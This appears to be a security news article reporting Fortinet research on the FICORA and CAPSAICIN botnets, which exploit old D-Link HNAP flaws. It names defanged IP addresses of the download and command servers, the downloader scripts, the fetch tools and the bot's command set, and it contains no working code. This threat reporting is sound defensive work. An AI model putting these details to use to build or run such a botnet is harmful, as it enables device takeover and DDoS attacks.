D-Link Vulnerabilities Fuels Global Botnet Attacks

D-Link Vulnerabilities Fuels Global Botnet Attacks

Spike in D-Link Router Attacks: Cybersecurity Experts Warn of New Botnets

Cybersecurity researchers have issued a stark warning about a recent surge in malicious activities targeting vulnerable D-Link routers. These attacks involve two distinct botnets: a Mirai variant known as FICORA and a Kaiten variant called CAPSAICIN. As these cyber threats evolve, it’s crucial for users to remain vigilant and proactive in securing their networks.

According to Fortinet FortiGuard Labs researcher Vincent Li, these botnets exploit documented vulnerabilities in D-Link routers, allowing remote attackers to execute harmful commands via the Home Network Administration Protocol (HNAP). This HNAP weakness was first revealed nearly a decade ago, impacting numerous devices with various CVE numbers, including CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and the newly identified CVE-2024-33112.

Global Impact of FICORA and CAPSAICIN Botnets

Telemetry data from Fortinet indicates that FICORA botnet attacks have been observed across various countries, while CAPSAICIN has primarily targeted regions in East Asia, notably Japan and Taiwan. Notably, CAPSAICIN activity intensified between October 21 and 22, 2024, highlighting its aggressive nature.

Mechanisms of Attack

The FICORA botnet facilitates the deployment of a downloader shell script named “multi” from a remote server with the IP address 103.149.87[.]69. This script is designed to fetch the main payload compatible with different Linux architectures using commands such as wget, ftpget, curl, and tftp. Furthermore, the malware includes a brute-force attack feature with a preset list of usernames and passwords. This Mirai derivative is also equipped to conduct distributed denial-of-service (DDoS) attacks utilizing UDP, TCP, and DNS protocols.

Similarly, CAPSAICIN employs a downloader script called “bins.sh,” which operates from a different IP address, 87.10.220[.]221. This approach mirrors FICORA’s strategy, ensuring compatibility across various Linux systems.

Key Functions of CAPSAICIN Malware

Once installed, CAPSAICIN takes control of the compromised device, executing commands from its command-and-control (C2) server, 192.110.247[.]46. The botnet can perform a range of malicious tasks, including:

  • GETIP: Retrieve the device’s IP address
  • CLEARHISTORY: Erase command history
  • RNDNICK: Change the victim host’s nickname randomly
  • ENABLE: Activate the bot
  • KILLMYEYEPEEUSINGHOIC: Terminate the original malware

Li emphasizes that despite the vulnerabilities being known and patched almost a decade ago, these attacks continue to pose a significant threat globally.

Importance of Regular Updates

To mitigate the risk of falling victim to these botnets, it is essential for enterprises and home users alike to regularly update their devices’ firmware and maintain vigilant monitoring of their networks.

For more information on securing your devices against cyber threats, visit Fortinet’s official blog or read about the latest in cybersecurity best practices.

Have you experienced any suspicious activity on your network? Share your thoughts in the comments below, and follow us on Twitter and LinkedIn for more updates on cybersecurity trends and tips.

Best deals on Microsoft Office
Share it

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *